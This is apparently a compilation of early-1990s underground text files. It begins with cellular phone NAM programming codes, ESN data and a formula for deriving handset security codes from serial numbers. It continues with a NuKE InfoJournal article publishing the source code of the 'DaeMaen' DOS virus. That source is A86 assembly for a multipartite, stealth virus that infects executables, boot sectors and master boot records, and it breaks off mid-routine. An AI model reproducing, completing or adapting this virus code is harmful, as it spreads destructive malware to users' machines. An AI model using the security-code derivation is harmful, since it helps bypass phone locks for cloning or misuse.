                            STO to increment
                           Once all data has been entered, press SEND to
                            program phgoe and exit Program Mode.

                      # of Digits
               System ID:  5    XXXXX + STO
               Local Use:  1    1 + STO
        Access (Min Opt):  1    1 + STO
           Mobile Number:  10   XXX-XXX-XXXX + STO
  Initial Paging Channel:  4    0333 or 0334
         Access Overload:  2    XX
        Preferred system:  1    0(B) or 1(A)
                Group ID:  2    XX
               Lock code:  4    XXXX

Press SEND to program phone exit.

                             SHINTOM CM-7600

Also marked as the following model numbers:

                           SHINTOM 8000 SERIES
                NAM Type:  EEPROM
            Manufacturer:  SHINTOM
              Programmer:  Handset
          ESN Prefix DEC:  174
                     HEX:  AE
 ESN, S/N Match Required:  Yes
    Handset Programmable:  Yes
      Number of Channels:  832

    Programming Sequence:  Power On
                           Press FUNC + 5 to lock phone
      Enter Program Mode:  FUNC + # + 626 + # + FUNC
                           Model Number and Software Version will display
                           Press SEND to advance
                           ESN will display in Hexidecimal
                           Press SEND to advance
                           Each Time SEND is pressed, another programming
                            parameter is displayed
                           The parameter may be changed, press SEND
                            to advance
                           To reach a specific parameter, press END + Address
                            Location + END
                           NAM Information is written with the sequence
                            END + FUNC + END
                           The phone will initialize and be in the Lock Mode.
                           Enter the programmed Unlock Code.

                      # of Digits
               Area Code:  3    XXX
            Phone Number:  7    XXX-XXXX
               System ID:  5    XXXXX
         Access Overload:  2    XX
                Group ID:  2    XX
               Local Use:  1    1
              MIN Option:  1    1
               Lock Code:  3    XXX (Preset 123)
               Auto Lock:  1    0(Off) or 1(On)
   Call Restriction Code:  3    XXX (Preset 123)
            Call Counter:  2    XX
               Handsfree:  1    0(Off) or 1(On)
              Horn Alert:  1    1
Horn Alert Auto
           Shut off Time:  1    0(2 hours)
                                1(4 hours)
                                2(8 hours)
                                3(no time limit)
         Cumulative Call:  2    XX (Preset 12)

                          SONY CM-P11 Portable
                NAM Type:  EEPROM
            Manufacturer:  SONY
              Programmer:  Handset
          ESN Prefix DEC:  154
                     HEX:  9A
 ESN, S/N Match Required:  Yes
    Stamped Model Number:  CMP11K
      Number of Channels:  832

    Programming Sequence:  Install charged portable battery
                           Power On
                           Enter #.+ 5118762 (To program NAM 1) or * +
                            413897 (To program NAM 2)
                           NAM 1 must be programmed before NAM 2
                           Once access code is entered, SID will display
                           Enter parameter then press SEND to increment
                           Press END to enter data and exit program mode

                      # of Digits
               System ID:  5    XXXXX + SEND
           Mobile Number:  7    XXX-XXXX + SEND
             Unlock Code:  4    XXXX + SEND
               Area Code:  3    XXX + SEND
               Local Use:  1    1 + SEND
              MIN Option;  1    1 + SEND
           Station Class:  2    10 + SEND
    Initial Paging Chan.:  3    333 or 334 + SEND
         Access Overload:  2    XX + SEND
        Preferred System:  1    (0=B or 1=A) + SEND
                Group ID:  2    XX + SEND
    End-to-End Signaling:  1    1 + SEND
                 Rep Opt:  1    1 + SEND
              Horn Alert:  1    0 + SEND
               Handsfree:  1    X + SEND
              Options(1):  3    XXX

(1) Options     Redial = 1
                Roam Inhibit = 2

Add assigned numbers to enable function (ie, to enable both redial and
roam inhibit enter 1+2=3). A second example would be to enable redial
and disable roam inhibit you would enter 1 (1+0=1)

             Display ESN:  Power On
                           Enter 07386260 (within 10 seconds)
                            "Selftest No" will display
                           Enter 10+SEND

     Multiple NAM Select:  F + 4 (Simultaneously for 2 seconds)
         New Unlock Code:  NAM
           System Select:  F + 4 + 4 + 4 etc.. (To scroll choices)
                            Standard (AB or BA)
                            A Only
                            B Only

See AT&T 1100 and 1200

Not field programmable.
Must be returned to factory for programming.

For more information call GATEWAY at 314-567-8943


                         TECHNOPHONE PC 105 Portable
                NAM Type:  EEPROM
            Manufacturer:  TECHNOPHONE
              Programmer:  Keypad
          ESN Prefix DEC:  162
                     HEX:  A2
 ESN, S/N Match Required:  Yes
      Number of Channels:  666

    Programming Sequence:  Power Off
                           Power On (*Key)
       Enter Access Code:  # + XXXXXX + # + # + 953739 +
                            # + UP Key + # + 99 + # + #
                            (XXXXX=Security Code)
                           Power Off (Lock key)
                           Power on (*Key) Phone should show NAM number
                            provided correct code has been entered
                           Enter NAM number (1 to 7) then press *
                           Press Up Key to increment
                           Enter data for each step then press UP Key
                            to step thru NAM
                           Once Initial Page Channel is entered, display
                            will show "System Ident"
                           Enter Alpha designation for city with
                            number keys. Press key repeatedly to
                            step thru letters and press # key to store
                            each letter.
                           Press UP Key, "Save NAM" will display
                           Press SND to write NAM information + END
                            to exit Program Mode

                      # of Digits
               System ID:  5    XXXXX + UP Key
           Mobile Number:  10   XXX-XXX-XXXX + UP Key
         Access Overload:  2    XX + UP Key
                Group ID:  2    XX + UP Key
             EX(MIN Opt):  1    1 + UP Key
    Initial Page Channel:  3    333 or 334 + UP Key

(1) Determining Phone's Security Code
 Subtract last six digits of phone's serial number from 999999
 Rearrange the six positions of the remaining number with the
 following formula:

Serial Number:  ABCDEF    Security Code:  FBDEA
Position 1(A)             Position 5(A)
Position 2(B)             Position 2(B)
Position 3(C)             Position 6(C)
Position 4(D)             Position 3(D)
Position 5(E)             Position 4(E)
Position 6(F)             Position 1(F)

Example: Stamped Serial Number is 123456
      - 123456
The Security code is 375486

         New Unlock Code:  MENU + 01 + MENU + 6 digit Security code
             Unlock Code:  (See above formula) + new 4 digit + CLEAR
           System Select:  UP ARROW + LITE (Toggles between AB or BA)

                        TECHNOPHONE PC 115 Portable
                NAM Type:  EEPROM
            Manufacturer:  TECHNOPHONE
              Programmer:  Keypad
          ESN Prefix DEC:  162
                     HEX:  A2
 ESN, S/N Match Required:  Yes
      Number of Channels:  666

    Programming Sequence:  Power Off
                           Power On (ON/C Key)
       Enter Access Code:  # + XXXXXX + # + # + 953739 + #
                            + MEM Key + # + 99 + MEM Key
                            (XXXXXX=Security Code (1))
                           Power Off
                           Power On (ON/C Key) Phone should show NAM
                            number provided correct code has been entered
                           Enter NAM Number (1 to 2) then press *
                           Press MEM Key to increment
                           Enter Data for each step then press MEM key to
                            step thru NAM
                           Once Initial Page Channel is entered, display
                            will show "System Ident"
                           Enter Alpha designation for city with
                            number keys. Press key repeatedly to select
                            thru letters, and press # key to store.
                           Press MEM Key, "Save NAM" will display
                           Press SND to write NAM information + END to exit
                            programming mode.

                      # of Digits
               System ID:  5    XXXXX + MEM Key
           Mobile Number:  10   XXX-XXX-XXXX + MEM Key
         Access Overload:  2    XX + MEM Key
                Group ID:  2    XX + MEM Key
           EXP (MIN Opt):  1    1 + MEM Key
    Initial Page Channel:  3    333 or 334 + MEM Key

(1) Determining Phone's Security Code -
  Subtract last six digits of phone's serial number from 999999
  Rearrange the six positions of the remaining number with the
  following formula:

 Serial Number:  ABCDEF    Security Code:  FBDEA
 Position 1(A)             Position 5(A)
 Position 2(B)             Position 2(B)
 Position 3(C)             Position 6(C)
 Position 4(D)             Position 3(D)
 Position 5(E)             Position 4(E)
 Position 6(F)             Position 1(F)

 Example: Stamped Serial Number is 123456
       - 123456
 The Security code is 375486

           System Select:  # + 1 + 1 + 1 + * (to toggle)

                     TECHNOPHONE PC 125(M2) Portable
                NAM Type:  EEPROM
            Manufacturer:  TECHNOPHONE
              Programmer:  Keypad
          ESN Prefix DEC:  162
                     HEX:  A2
 ESN, S/N Match Required:  Yes
      Number of Channels:  666

    Programming Sequence:  Power Off
                           Power On (*Key)
       Enter Access Code:  # + XXXXXX + # + # +
                            953739 + # + UP Key + STORE + 99 + # + #
                            (XXXXXX=Security Code (1))
                           Power Off (Lock)
                           Power On (*Key), Phone will ask which NAM
                            provided correct code has been entered.
                           Enter NAM Number (0-7) then press *
                           Press UP Key to increment
                           Enter Data for each step then press UP Key to
                            step thru NAM
                           Once Initial Page Channel is entered, display
                            will show "System Ident"
                           Enter Alpha designation for city with number
                            keys. Press key repeatedly to step thru
                            letters and press # key to store each letter
                           Press UP Key, "Save NAM" will display
                           Press CALL to write NAM information + END to exit
                            Programming Mode

                      # of Digits
               System ID:  5    XXXXX + UP Key
           Mobile Number:  10   XXX-XXX-XXXX + UP Key
         Access Overload:  2    XX + UP Key
                Group ID:  2    XX + UP Key
            EXP(MIN Opt):  1    1 + UP Key
    Initial Page Channel:  3    333 or 334 + UP Key

(1) Determining Phone's Security Code -
  Subtract last six digits of phone's serial number from 999999
  Rearrange the six positions of the remaining number with the
  following formula:

 Serial Number:  ABCDEF    Security Code:  FBDEA
 Position 1(A)             Position 5(A)
 Position 2(B)             Position 2(B)
 Position 3(C)             Position 6(C)
 Position 4(D)             Position 3(D)
 Position 5(E)             Position 4(E)
 Position 6(F)             Position 1(F)

 Example: Stamped Serial Number is 123456
       - 123456
 The Security code is 375486

           System Select:  UP ARROW + SYSTEM + UP ARROW (Repeatedly) + SYSTEM (to lock)

                NAM Type:  EEPROM
            Manufacturer:  TECHNOPHONE
              Programmer:  Keypad
          ESN Prefix DEC:  162
                     HEX:  A2
 ESN, S/N Match Required:  Yes
      Number of Channels:  832

    Programming Sequence:  Power Off
                           Power On (*Key)
       Enter Access Code:  # + XXXXXX + # + # + 953739
                            + # + UP Key + STORE + 99 + # + #
                            (XXXXXX=Security code (1))
                           Power Off (Lock)
                           Power On(* Key) Phone will ask which NAM
                            provided correct code has been entered
                           Enter NAM number (0-7) then press *
                           Press UP Key to increment
                           Enter Data for each step then press UP Key
                            to step thru NAM
                           Once Initial Page Channel is entered, display
                            will show "System Ident"
                           Enter Alpha designation for city with number keys.
                           Press key repeatedly to step thru letters and
                            press # key to store each letter.
                           Press UP Key, "Save NAM" will display
                           Press SND to write NAME info, + END to exit phone

                      # of Digits
               System ID:  5    XXXXX + UP Key
           Mobile Number:  10   XXX-XXX-XXXX + UP Key
         Access Overload:  2    XX + UP Key
                Group ID:  2    XX + UP Key
           EXP (MIN Opt):  1    1 + UP Key
    Initial Page Channel:  3    333 or 334 + UP Key

(1) Determining Phone's Security Code -
  Subtract last six digits of phone's serial number from 999999
  Rearrange the six positions of the remaining number with the
  following formula:

 Serial Number:  ABCDEF    Security Code:  FBDEA
 Position 1(A)             Position 5(A)
 Position 2(B)             Position 2(B)
 Position 3(C)             Position 6(C)
 Position 4(D)             Position 3(D)
 Position 5(E)             Position 4(E)
 Position 6(F)             Position 1(F)

 Example: Stamped Serial Number is 123456
       - 123456
 The Security code is 375486

         New Unlock Code:  MENU + 01 + MENU + 6 digit Security code +
                            4 digit unlock code + CLEAR
           System Select:  UP ARROW + SYSTEM + UP ARROW + (Repeatedly)
                            + SYSTEM (to lock)

                NAM Type:  EEPROM
            Manufacturer:  TECHNOPHONE
              Programmer:  Keypad
          ESN Prefix DEC:  162
                     HEX:  A2
 ESN, S/N Match Required:  Yes
    Stamped Model Number:  PC 205A
      Number of channels:  832

    Programming Sequence:  Power Off
                           Power On
       Enter Access Code:  # + 000000 + # + # + 953739
                            + # + MEM + 99 + MEM + MEM
                           Power Off and On again
        Enter NAM number:  F + X; X=1 to 8
                           Press "F" key to increment
                           Enter data for each step then press "F" key
                            to step thru NAM
                           Once programming is complete, press * + F
                            to enter data

                      # of Digits
               System ID:  5    XXXXX + F Key
           Station Class:  2    10 + F Key
        Mobile Area Code:  3    XXX + F Key
               Area Code:  3    XXX + F Key (Same as above)
           Mobile Number:  7    XXX-XXXX + F Key
         Access Overload:  2    XX + F Key
                 MIN Opt:  1    1 + F Key
    Initial Page Channel:  3    (333 or 334) + F Key
 Initial Control Channel:  3    (333 or 334) + F Key
 Alt System Control Chan:  3    (333 or 334) + F Key
Alphanumerically enter
               City Name:  3    (3 letters max, ie, Mtl=Montreal)
      International Code:  3    011 + F Key
        Emergency Number:  3    911 + F Key
                Operator:  1    0 + F Key
Additional NAMS - Enter NAM Number (1-8) or F Key to review program contents

Press * + F to enter data

         New Unlock Code:  F + F + F(enter Unlock Code - preset 0000)
                           (Menu C Displays) + F + 3 (current Unlock code
                           displays) + Enter new 4 digit Unlock Code  + END

           System Select:  F + 3 + F + F + etc.. (to Scroll choices) +
                            END (to exit)
                              Pref (A only or B only)
                              Non-Pref (B onlt or A only)
                              Auto (AB or BA)

              TECHNOPHONE MC905a, MC905MKII, MC985A and MC9995
                NAM Type:  EEPROM
            Manufacturer:  TECHNOPHONE
              Programmer:  Keypad
          ESN Prefix DEC:  162
                     HEX:  A2
 ESN, S/N Match Required:  No (See Display ESN)
    Stamped Model Number:  905, 985 and 995 on handset
      Number of Channels:  832

    Programming Sequence:  Power On
                           Phone should display "Which NAM", if not
                            perform the following Sequence:
                             Press CLR three times (Rapidly)
                             Enter #+000000+#+#+952729+#+STO+99+STO+STO
                             Power Phone OFF then ON again
                             Phone should display "Which NAM"
                           Enter NAM number (1-8) + STO
                           Enter each of the following parameters then
                            press * to store
                           Press SEND to program phone or END to
                            exit without changing existing information

                      # of Digits
               System ID:  5    XXXXX + *
           Mobile Number:  10   XXX-XXX-XXXX + *
         Access Overload:  2    XX + *
                Group ID:  2    XX + *
            MIN Opt(EXP):  1    1 + *
    Initial Page Channel:  3    333(A) or 334(B) + *
System ID-Alpha Notation:  3    (System ID)

Press SEND to Store information

             Display ESN:  MU + 0 + 1
              Horn Alert:  Turn Ignition Off+MU+07+MU (to toggle
                            On or Off) Press CLR to exit
         New Unlock code:  MU + 17 + 4 digit unlock code
                            (Preset 0000) + new 4 digit unlock code + MU
                            (Press CLR to exit)
           System Select:  MU + 21 + MU (to toggle) (Toggles
                            between AB and bA) + CLR (to exit)

                             TECHNOPHONE MC915A
                NAM Type:  EEPROM
            Manufacturer:  TECHNOPHONE
              Programmer:  Keypad
          ESN Prefix DEC:  162
                     HEX:  A2
 ESN, S/N Match Required:  Yes
      Number of Channels:  832

    Programming Sequence:  Power On
                           Phone should display "Which NAM", if not
                            perform the following sequence
                           Press CLR three times (Rapidly)
                           Enter #+000000+#+#+953739+#+STO+29+STO+STO
                           Power Phone Off and On again
                           Phone should display "which NAM"
                           Enter NAM number 1 or 2 + STO
                            then press * to store each parameter
                           Press SEND to program phone or END (to
                            exit without changing existing programming

                      # of Digits
               System ID:  5    XXXXX + *
           Mobile Number:  10   XXX-XXX-XXXX + *
         Access Overload:  2    XX + *
                Group ID:  2    XX + *
            MIN Opt(EXP):  1    1 + *
    Initial Page Channel:  3    333(A) or 334(B) + *
System ID-Alpha Notation:  3    system ID

Press SEND to Store Information

              Horn Alert:  MU + 05 + MU (to toggle On or Off)
                            (Press CLR to exit)
         New Unlock Code:  MU + 08 + 4 digit unlock code
                            (Preset 0000) + new 4 digit unlock code + MU
                            (Press CLR to exit)
           System Select:  MU + 11 + MU (to toggle) (Toggles
                            between AB or BA)

           UNIDEN CP-900, 1000, 1050, 1100, 1200, 1500, 1900, 2000,
                    3000, PRESIDENT 4000 GTS and 4500 GTS
                NAM Type:  EEPROM
            Manufacturer:  UNIDEN
              Programmer:  Serivce Handset or Programmer Handset
          ESN Prefix DEC:  172
                     HEX:  AC
 ESN, S/N Match Required:  Yes
    Handset Programmable:  Service Handset or Programmer Handset
      Number of Channels:  666 (900, 1000) others 832

    Programming Sequence:  Connect antenna or load
                           Power Off
                           Disconnect standard handset
                           Connect blue or white service handset
  White Handset (CP-010):  Turn Power Switch On while holding *
                            and # continue holding * and # for two seconds
    Blue Handset(CP-210):  Turn Power Switch On
                           Press SELECT + 2 + SEND
           Both Handsets:  Enter step number, then data for individual
                           Press STO to enter data for each step
                           Increment by pressing next step number
  To review parameters press:  RCL + Step number + STO (to exit)
                           If phone has dual NAM(ie 1050, 1500 & 2000),
                           Press 9 + 5 + SEND (to toggle between NAMs)
                           Press SEND to write NAM information
                           PASS will appear in display if data is valid

Step                  # of Digits
0              System ID:  5    XXXXX + STO
1              Local Use:  1    (0 or 1) + STO
2                MIN Opt:  1    (0 or 1) + STO
3          Mobile Number:  10   XXX-XXX-XXXX + STO
4    Initial Paging Chan:  3    (333 or 334) + STO
5        Access Overload:  2    XX + STO
6       Preferred System:  1    [0 (B) or 1 (A)] + STO
7               Group ID:  2    XX + STO
8         Local Code (1):  4    XXXX + STO
9       F5 DTMF Duration:  2    0-100ms or 1-Continous

Press STO to increment to F6 or A

All models Except 1500, 1900 and 4500 GTS

      F6 Automatic Power:  1    0=3 hrs or 1=6 hrs

A  Handset/Handsfree 1
 0(phone auto transfers from switching H/S to H/F) OR
 1(call ends when H/S is placed in cradle unless user presses
   RCL + 6 + 6)

Press STO after entering F6 or A data
Press SEND to exit program mode

              Horn Alert:  RCL + 9 + 9 + Turn Ignition Off

         New Unlock Code:  NAM

           System Select:  X + STO + 8 + 8
                                 X=1  A only
                                 X=2  B only
                                 X=3  Home
                                 X=4  Standard AB or BA
                                 X=5  Inverted BA or AB

                      UNIDEN 5000 and 6000 GTS Portable
                NAM Type:  EEPROM
            Manufacturer:  UNIDEN
              Programmer:  Program or Service Handset with CP 505 Adaptor
          ESN Prefix DEC:  172
                     HEX:  AC
 ESN, S/N Match Required:  Yes
    Stamped Model Number:  5000 or 6000 GTS
      Number of Channels:  832

    Programming Sequence:  Power Off
                           Remove Battery and install CP505 or CP505A adaptor
                           Connect CP505(A) to power supply or to CP
                            504 battery eliminator per adaptor instructions
                           Connect Program Handset to CP 505(A) adaptor
  White Handset (CP-010):  Turn Power Switch On while holding *
                            and # continue holding * and # for two seconds
    Blue Handset(CP-210):  Turn Power Switch On
                           Press SELECT + 2 + SEND
           Both Handsets:  Enter step number, then data for individual
                           Press STO to enter data for each step
                           Increment by pressing next step number
 To review parameters press:  RCL + Step number + STO (to exit)
                           To select Alternate NAM, Press 1 + STO + 90 (NAM 1)
                            or 2 + STO + 90 (NAM 2)
                           Press SEND to write NAM information
                           PASS will appear in display if data is valid

 Step                 # of Digits
 0             System ID:  5    XXXXX + STO
 1             Local Use:  1    (0 or 1) + STO
 2               MIN Opt:  1    (0 or 1) + STO
 3         Mobile Number:  10   XXX-XXX-XXXX + STO
 4  Initial Page Channel:  3    (333 or 334) + STO
 5       Access Overload:  2    XX + STO
 6      Preferred System:  1    [0 (B) or 1 (A)] + STO
 7              Group ID:  2    XX + STO
 8         Lock code (1):  4    XXXX + STO
 9  Options F5 DTMF
                Duration:  1    0 - Continuous
                                1 - 100 ms

Press STO to program phone

         New Unlock Code:  RCL + 70 + Current 4 digit Unlock code
                            + new 4 digit Unlock code

           System Select:  X + STO + 8 + 8
                            X=1  A only
                            X=2  B Only
                            X=3  Home
                            X=4  Standard AB or BA
                            X=5  Inverted BA or AB

                           UNIDEN CP-5500 Portable
                NAM Type:  EEPROM
            Manufacturer:  UNIDEN
              Programmer:  Keypad
          ESN Prefix DEC:  172
                     HEX:  AC
 ESN, S/N Match Required:  Yes
    Stamped Model Number:  CP-5500
      Number of Channels:  832

    Programming Sequence:  Install fully charged battery
                           Power On
                           Select NAM
                                  NAM 1:  1 + STO + 90
                                  NAM 2:  2 + STO + 90
                           Power Off
                           Press PWR key while holding * and #
                           Continue holding * and # for four seconds
                            "Roam.No Svc.In Use& M" lights will display
                           Release * and # keys
                           Enter sequence 32218591 (within 7 seconds)
                            SID will display
                           Enter Step number, then data for individual
                           Press STO to enter data for each step
                            (ie to enter System ID, press 0+XXXXX+STO)
                           Increment by pressing next step number
 To review parameters press:  RCL + step number
                            + STO (to exit)
                           Press SEND to write NAM information
                           PASS will appear in display if data is valid
                           Press END to exit program mode

Step                  # of Digits
0              System ID:  5    XXXXX + STO
1              Local Use:  1    (0 or 1) + STO
2                MIN Opt:  1    (0 or 1) + STO
3          Mobile Number:  10   XXX-XXX-XXXX + STO
4   Initial Page Channel:  3    [333 or 334] + STO
5        Access Overload:  2    XX + STO
6       Preferred System:  1    [9 (B) or 1 (A)] + STO

Note 1:  Step number will not display when entering mobile number)

7               Group ID:  2    XX + STO
8              Lock Code:  4    XXXX + STO
9          DTMF Duration:  1    0 - 100 ms or
                                1 - Continuous

Press STO after entering Step 9
Press SEND to write data
Press END to exit program mode

        New Program code:  RCL + 70 + Current 4-digit Program Lock
                            Code (Preset 0000) + new 4 digit program
                            code + STO + END
         New Unlock Code:  RCL + 70 + 4 digit program Lock Code
                            (Preset 0000) + SEND + New 4 digit Unlock Code
                            (Preset 0123) + STO + END

           System Select:  X + STO + 8 + 8
                                 X=1  A Only
                                 X=2  B Only
                                 X=3  Home
                                 X=4  Standard AB or BA
                                 X=5  Inverted BA or AB
                                 X=6  System ID (*)

    (*) To set System ID:  CLR + 5 digit System ID + STO + 72

To view current System Select Setting:  RCL + 88

                             USA CORP Portable
                NAM Type:  EEPROM
            Manufacturer:  MITSUBISHI
              Programmer:  Keypad
          ESN Prefix DEC:  134
                     HEX:  86
 ESN, S/N Match Required:  No
    Handset Programmable:  Yes
      Number of Channels:  666

    Programming Sequence:  Power On (END/FCN and 0 for one second)
                           While holding CLR, enter 4472866 or 4476822
                            or 6926232
                           Enter data then press SEND to increment
                           Press END/FCN to write NAM information

                      # of Digits
           Mobile Number:  10   XXX-XXX-XXXX
             Unlock Code:  3    XXX
               System ID:  5    XXXXX
               Local Use:  1    1
                 MIN Opt:  1    1
    Initial Page Channel:  3    333 or 334
         Access Overload:  2    XX
        Preferred System:  1    0(B) or 1(A)
                Group ID:  2    XX
    End-to-End Signaling:  1    1
             Booster Opt:  1    0 or 1
          Autonomous Reg:  1    0 or 1

                                WALKER 910
                NAM Type:  Tri-State
            Manufacturer:  WALKER
              Programmer:  MOTOROLA 1801-CLENAM or Curtis
          ESN Prefix DEC:  152
                     HEX:  98
 ESN, S/N Match Required:  Yes
    Handset Programmable:  No
      Number of Channels:  666

            Phone Number:  XXX-XXX-XXXX
               Lock Code:  XXX
                 MIN Opt:  Enabled
           Repertory Opt:  Enabled
               Handsfree:  Disabled (Enabled if Equipped)
               Local Use:  Enabled
    End-to-End Signaling:  Enabled
              Horn Alert:  Enabled
               System ID:  XXXXX
        Preferred System:  A or B
         Access Overload:  XX
  Initial Paging Channel:  333 or 334
           Station Class:  00

Hex Address             B7           B0
    13                  1 0 0 0 0 0 0 1

        Hex Address 13 - B0  Total Call Timer
                         B2  Preferred Only
                         B7  Individual Call Timer

              horn Alert:  (ALT)
         New Unlock Code:  NAM
           System Select:  Switch on side or cradle (BA or AB)

          uK                                                       E-
          E-            "The DaeMaen Virus Source Code"            Nu
          Nu                                                       KE
          KE                                                       -N
          -N     Article By                   Virus By             uK
          uK    Rock Steady                    TaLoN               E-
          E-                                                       Nu

NuKE InfoJournal #7
August 1993

Well, here it is, the DaeMaen virus...the binary has been out for quite a
while now.  Two versions of DaeMaen exist; the source code presented here
is from the first version.  The changes made in the second version were
minor.  You'll need to assemble this with the A86 assembler.  It is *not*
compatible with MASM or TASM due to some minor directive differences, but
it can easily be modified to compiler under the more popular assemblers
(we chose to present to you the original, untouched source code, straight
from the author).

It is an extremely nice piece of work, only 2k in size, quite tight for
all that code (it does .COM, .EXE, .SYS, .BIN, .OVL, and boot sector
infections).  However it is somewhat lacking:  some methods of infection
are somewhat lacking, and I'm not too thrilled about the technique of
infecting on file closes.  Nevertheless, I find it extrordinary learning

                            Rock Steady/NuKE

[Note:  TaLoN aka Terminator-Z is no longer with NuKE due to legal problems.
After being investigated by Australian authorities for illegal activities
totally unconnected to his role in NuKE, he decided to take the heat off
himself by "turning in" members of NuKE for crimes that they never committed.
It is sad to see such a fine programmer do something so dispicable and
underhanded, and we at NuKE regret his decision.  We wish him all the best
in the courts... -NM]

-------------------------------- CUT HERE -------------------------------------
; D?eM??n Virus specifications:
; An extrodinary virus if we may say so. It is able to infect .COMs, .EXEs,
; .SYSs, .BINs, .OVLs, Floppy Boot Sectors, HD Master Boot Records.
; Infects files on executions, opens, ext opens, attribs, close & renames.
; Infected files will feature a simple Random key encryption routine.
; Stealth abilities range from, redirects read/write away from partition table
; "Dir", hides file size increase without CHKDSK fuckups
; Memory stealth, memory disappears from DOS's view without function calls
;                                       -January 28, 1993 -TaLoN

org 0

@tsrchk equ     0a7ceh                          ; fingerprint
@mbr    equ     9                               ; sector of original MBR
@com_exe equ    0
@sys    equ     1
@JO     equ     070h                            ; JO operand for variable branch
@JMPS   equ     0ebh                            ; JMP SHORT (as above)
@RET    equ     0c3h                            ; RET for encrypt shit

p_len   equ     3072/16                         ; 3k in paragraphs


syshead db      18 dup 90h                      ; header for SYS infection

                push ax
                push cx
                push si
                push ds
                push bp
                call encr_decr

e_start:        cld
                call $+3
                pop si
                sub si, $-1
                mov bp, es

branch:         jo sys_entry

com_exe_entry:  add sp, 10                      ; fuck off other registers
                call chk
                jz get_lost
                jmp domem
pre_gl:         xor si, si

get_lost:       mov es, bp                      ; exit without fingerprints
                push cs
                pop ds
                add si, offset old_shit
gl:             jo exit_exe
                mov di, 0100h
                push bp
                push di
                jmp short zero_shit
exit_exe:       add bp, 10h
                add ax, bp
                xchg ax, bx
                mov ss, bx
                xchg ax, sp
                xchg ax, bx
                add ax, bp
                push ax
                push bx
                sub bp, 10h

zero_shit:      xor ax, ax                      ; clean our hands
                mov bx, ax
                mov cx, ax
                mov dx, ax
                mov si, ax
                mov di, ax
                mov ds, bp
                mov bp, ax
                retf                            ; I didn't see nothin'

sys_entry:      ;int 05                          ; for debugger
                mov ax, word ptr [si+old_shit]
                mov word ptr [6], ax            ; restore INTR address
                push ax
                push bx
                push dx
                push di
                push es
                push ax
                call chk
                pop ax
                jz go_sys_exit
                push ax

                mov cx, si
                push si
                lea ax, [si+4096]
                mov bx, 10h
                xor dx, dx
                div bx
                inc ax                          ; align on paragraph boundary
                mov bx, cs
                add ax, bx
                mov es, ax
                xor si, si
                xor di, di
                rep movsb                       ; move the driver up in memory

                push cs
                pop es
                xor di, di
                mov cx, v_len
                mov bx, offset sys_00
                jmp move_us
go_sys_exit:    jmp short sys_exit
sys_00:         push ax
                mov ax, cs
                inc ah
                mov es, ax
                mov bp, ax
                pop ds
                xor si, si
                mov di, si
                pop cx
                rep movsb                       ; move SYS to final resting place
                push es
                pop ds
                push cs
                pop es
                xor si, si
                mov di, si
                mov cx, 9
                rep movsw                       ; copy their header

                xor si, si
                push cs
                pop ds
                call dms                        ; do some hooking shit
                pop ax
                mov word ptr [strat_1], ax
                mov word ptr [strat_1+2], bp
                mov word ptr [intr_1+2], bp
                mov ax, word ptr [8]
                mov word ptr [intr_1], ax
                mov word ptr [6], offset strat  ; hehe trick DOS
                mov word ptr [8], offset intr

sys_exit:       pop es
                pop di
                pop dx
                pop bx
                pop ax

                pop bp                          ; restore registers
                pop ds
                pop si
                pop cx
                pop ax
                jc sys_exit_2
                push word ptr cs:[6]
sys_exit_2:     jmp strat

        db      '[D?eM??n] by T?L?N-{N?K?}'

new13:          ; check for floppy access
                ; check for hd read sector 1
                cmp ax, @tsrchk
                jne n13_2
                xchg ax, bx
                push cs
                pop es
n13_2:          push ax
                shr ah, 1
                cmp ah, 1
                jne exit13
                cmp dl, 80h
                jb do_floppy
                ja exit13
                or dh, dh                       ; head 0?
                jnz exit13
                cmp cx, 1                       ; sector 1?
                ja exit13
                pop ax
                cmp ax, 0309h                   ; writing a few sectors?
                jae e13                         ; yeah.. let him
                call save
                push ax
                mov al, 1                       ; give him the "real" MBR
                mov cx, @mbr
                call i13

                pop ax
                dec al                          ; and read the rest of
                or al, al                       ; what he wants
                jz hd_done1

                add bx, 200h
                call i13
                sub bx, 200h

hd_done1:       call restore                    ; no sectors left
                inc ax
                xor ah, ah                      ; status=no error
                retf 2

gorestore:      call restore
exit13:         pop ax
e13:            jmp bypass

do_floppy:      call save
                xor ax, ax
                mov ds, ax
                inc dl
                test byte ptr [43fh], dl        ; drive still spinning?
                jnz gorestore                   ; yeah, don't reinfect
                dec dl
                call gooknuke
                call eat_floppy
                jmp short gorestore

new13_2:        ; the guts of multipartite infection
                ; check to see if i21 has changed... if so, hook it
                call save
                push cs
                pop es
                xor ax, ax
                mov ds, ax
                mov si, 21h*4
                mov di, offset oldvect+8
                je nochange
                je nochange
                call capture_21
                push cs
                pop ds
                mov si, offset oldvect+0        ; copy over saved shit so that
                lea di, [si+4]                  ; our i13 doesn't call here
                movsw                           ; any more [i21 has been hooked]
nochange:       call restore
                jmp dword ptr cs:[oldvect+0]

        db      'Hugs to Sara Gordon'           ; get her agro

new21:          ; guts
                cmp ah, 11h                     ; FIND_FIRST
                je go_kstealth
                cmp ah, 12h                     ; FIND_NEXT
                je go_kstealth
                cmp ah, 3ch                     ; CREAT
                je create
                cmp ah, 3dh                     ; OPEN
                je letsgo
                cmp ah, 3eh                     ; CLOSE
                je close
                cmp ah, 43h                     ; ATTRIB
                je letsgo
                cmp ax, 4b00h                   ; EXEC
                je letsgo
                cmp ah, 56h                     ; RENAME
                je letsgo
                cmp ah, 6ch                     ; EXT_OPEN
                jne n21_2
                push dx
                mov dx, si
                call infect
                pop dx
                jmp short n21_2
letsgo:         call infect
n21_2:          jmp dword ptr cs:[oldvect+8]

file_end:       mov ax, 4202h
                jmp short seek_vals
file_zero:      mov ax, 4200h
seek_vals:      xor cx, cx
                xor dx, dx
i21:            pushf
                push cs
                call n21_2

go_kstealth:    jmp short kstealth

create:         call i21                        ; go create the file
                jc creat_exit                   ; successful?
                mov word ptr cs:[handle], ax    ; save handle
                call save
                call save_name
                call restore
creat_exit:     retf 2

close_r dw      offset creat_exit
close:          push word ptr cs:[close_r]
                call i21
                jc close_exit
                cmp word ptr cs:[handle], bx    ; the one we've got stored?
                jne close_exit
                call save
                jmp infect_2                    ; external entry
go_ce:          call restore
close_exit:     ret                             ; exit with current flagz

kstealth:       ; stole some of this from Mutating Rocko, mine wouldn't
                ; quite work right!  but I have changed it substantially..

                call i21
                or      al,al           ;Good FCB?
                jnz     no_good         ;nope
                push    ax
                push    bx
                push cx
                push ds
                push    es
                mov     ah,51h          ;Is this Undocmented? huh...
                call    i21

                mov     es,bx
                cmp     bx,es:[16h]
                jnz     not_infected    ;Not for us man...
                mov     bx,dx
                mov     al,[bx]
                push    ax
